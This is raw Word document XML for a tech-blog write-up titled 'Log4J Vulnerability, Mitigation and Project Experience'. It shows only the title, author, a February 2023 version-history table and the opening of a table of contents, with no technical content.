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FBFB" w14:textId="6FF764D7" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:position w:val="-15"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:position w:val="-15"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Tech BLOG</w:t>
      </w:r>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:position w:val="-15"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> Document – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:position w:val="-15"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Log4J Vulnerability, Mitigation and Project Experience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5156B4A2" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="00927513" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Georgia" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rStyle w:val="NAMEORANGE"/>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Georgia" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065C8CA3" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc126223988"/>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Version history</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="278BFE44" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Created: Mohamed Nasrudeen meeran </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A64142" w14:textId="09CC000B" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Last Updated: </w:t>
      </w:r>
      <w:r w:rsidR="00784C0E">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00784C0E">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>FEB</w:t>
      </w:r>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>-2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4522508D" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="9530" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2436"/>
        <w:gridCol w:w="2435"/>
        <w:gridCol w:w="2523"/>
        <w:gridCol w:w="2136"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A5E5B" w:rsidRPr="003A290F" w14:paraId="252FB650" w14:textId="77777777" w:rsidTr="00700DF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36" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50790751" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E1A7CF3" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2523" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69385DE7" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2136" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="327748C7" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Note</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A5E5B" w:rsidRPr="003A290F" w14:paraId="2C8C4BB8" w14:textId="77777777" w:rsidTr="00700DF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36" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3271E17F" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Created By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55E49516" w14:textId="482AD97F" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t xml:space="preserve">Mohamed </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Nasrudeen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t xml:space="preserve"> Meeran</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2523" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D383F90" w14:textId="2FA36DEA" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="00784C0E" w:rsidP="00700DF3">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>01</w:t>
            </w:r>
            <w:r w:rsidR="003A5E5B" w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Feb</w:t>
            </w:r>
            <w:r w:rsidR="003A5E5B" w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="003A5E5B" w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2136" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31EB5799" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Initial Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A5E5B" w:rsidRPr="003A290F" w14:paraId="53FC1235" w14:textId="77777777" w:rsidTr="00700DF3">
        <w:trPr>
          <w:trHeight w:val="569"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2436" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D41A218" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A290F">
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Amended By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2435" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79F43ACC" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2523" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29809A46" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2136" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45AB3424" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="00700DF3">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08535FE3" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DINNextLTPro-Light" w:hAnsi="DINNextLTPro-Light"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:id w:val="328643532"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="019238C6" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRPr="003A290F" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="DINNextLTPro-Regular" w:hAnsi="DINNextLTPro-Regular"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="003A290F">
            <w:rPr>
              <w:rFonts w:ascii="DINNextLTPro-Regular" w:hAnsi="DINNextLTPro-Regular"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="6BAB2A6D" w14:textId="58F85DFC" w:rsidR="005C09CA" w:rsidRDefault="003A5E5B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="003A290F">
            <w:rPr>
              <w:rFonts w:ascii="DINNextLTPro-Regular" w:hAnsi="DINNextLTPro-Regular"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="003A290F">
            <w:rPr>
              <w:rFonts w:ascii="DINNextLTPro-Regular" w:hAnsi="DINNextLTPro-Regular"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="003A290F">
            <w:rPr>
              <w:rFonts w:ascii="DINNextLTPro-Regular" w:hAnsi="DINNextLTPro-Regular"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc126223988" w:history="1">
            <w:r w:rsidR="005C09CA" w:rsidRPr="00135387">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="DINNextW01-Bold" w:eastAsia="Times New Roman" w:hAnsi="DINNextW01-Bold" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:caps/>
                <w:noProof/>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Version history</w:t>
            </w:r>
            <w:r w:rsidR="005C09CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005C09CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005C09CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc126223988 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005C09CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005C09CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005C09CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005C09CA">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20877EED" w14:textId="3D345732" w:rsidR="005C09CA" w:rsidRDefault="005C09CA">
          <w:pPr>
